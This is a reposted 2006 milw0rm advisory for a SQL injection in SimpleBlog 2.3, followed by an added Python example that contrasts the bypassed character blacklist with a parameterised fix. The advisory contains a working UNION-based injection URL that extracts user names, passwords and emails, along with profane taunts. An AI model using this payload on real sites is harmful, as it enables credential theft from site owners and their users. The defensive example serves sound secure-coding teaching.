Computer Security
[EN] securityvulns.ru

From:MILW0RM <submit_(at)_milw0rm.com>
Date:04.09.2006
Subject:SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability

                                          _           _        
                                   __   _(_)_ __  ___| |_ __ _
                                   \ \ / / | '_ \/ __| __/ _` |
                                    \ V /| | |_) \__ \ || (_| |
                                     \_/ |_| .__/|___/\__\__,_|
                                         |_| AnD
                              _               _    _ _ _     
                      _ __ ___  _   _ _ __ __| | ___ _ __ ___| | _(_) | |____
                     | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_  /
                     | | | | | | |_| | | | (_| |  __/ |  \__ \   <| | | |/ /
                     |_| |_| |_|\__,_|_|  \__,_|\___|_|  |___/_|\_\_|_|_/___|

+-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp                  |
+-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3  |
| App Author: 8pixel.net  |
| App Version: <= 2.3  |
| App Type: Blog/Journal  |
+-----------------------------------------------------------------+
| DETAILS  |
+-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection  |
| Requirements: Database with UNION support  |
| Revisions: Note - This is a revision of another vuln          |
|            posted by Chironex Fleckeri  |
+-----------------------------------------------------------------+
| CODE  |
+-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities.   |
| However this bullshit was easily worked around by  |
| Vipsta & MurderSkillz.  |
|  |
| Vendor attempted to remove illegal characters like ' and =      |
| which stop most SQL injection vulnerabilities. However:  |
| Vendor failed to remove '>' symbol.  |
+-----------------------------------------------------------------+
| EXPLOIT  |
+-----------------------------------------------------------------+
| SQL Injection String:  |
+-----------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1  |
+-----------------------------------------------------------------+
| TIMELINE  |
+-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified.  |
| 9/2/06 - Vendor Replied. Threatens legal action.  |
| 9/4/06 - Exploit Released with no details to vendor.            |
+-----------------------------------------------------------------+
| SHOUTZ  |
+-----------------------------------------------------------------+
| Everyone at g00ns.net - including:  |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo,  |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot,  |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be,  |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot!   |
+-----------------------------------------------------------------+
| ADDITIONAL NOTES  |
+-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net  |
| IRC: irc.g00ns.net  |
+-----------------------------------------------------------------+
| PERSONAL STUFF  |
+-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON.                         |
+-----------------------------------------------------------------+

                                            __
                                 ___  ___  / _|
                                / _ \/ _ \| |_
                               |  __/ (_) |  _|
                                \___|\___/|_|.

# milw0rm.com [2006-09-04]
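
Added example, not part of the original advisory and not the vendor's code: it shows why a character blacklist that strips ' and = does not protect an id used in a numeric context, beside a corrected lookup that validates the type and binds the value. Assumptions: SQLite stands in for the application's database, the T_POSTS table and its nine columns are hypothetical, the sample rows are constructed, and only T_USERS and its column names come from the advisory.

```python
import re
import sqlite3

# Constructed schema. T_USERS and its column names come from the advisory;
# T_POSTS and its nine columns are assumptions made for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE T_POSTS (id INTEGER, c2, c3, c4, c5, c6, c7, c8, c9);
        CREATE TABLE T_USERS (ID INTEGER, uFULLNAME, uUSERNAME, uPASSWORD,
                              uEMAIL, uDATECREATED);
        INSERT INTO T_POSTS VALUES (1,'Hello','body','','','','','','');
        INSERT INTO T_USERS VALUES (2,'Sample User','sample','constructed-hash',
                                    'sample@example.test','2006-01-01');
    """)
    return db

def blacklist_filter(value):
    """The kind of fix the advisory describes: strip ' and = only."""
    return value.replace("'", "").replace("=", "")

def lookup_filtered(db, raw_id):
    # Weak: the id sits in a numeric context, so no quote is needed to
    # alter the statement; stripping ' and = leaves keywords and > intact.
    sql = "SELECT * FROM T_POSTS WHERE id=" + blacklist_filter(raw_id)
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # Corrected: accept only digits, then bind the value as a parameter
    # so it can never be parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT * FROM T_POSTS WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# The id value from the advisory's URL, URL-decoded.
ADVISORY_ID = ("-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,"
               "uDATECREATED,null,null,null FROM T_USERS WHERE id>1")
```

The filter returns the advisory's id value unchanged, so the concatenated query returns the T_USERS row, while the hardened lookup rejects the same input before any SQL is executed.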
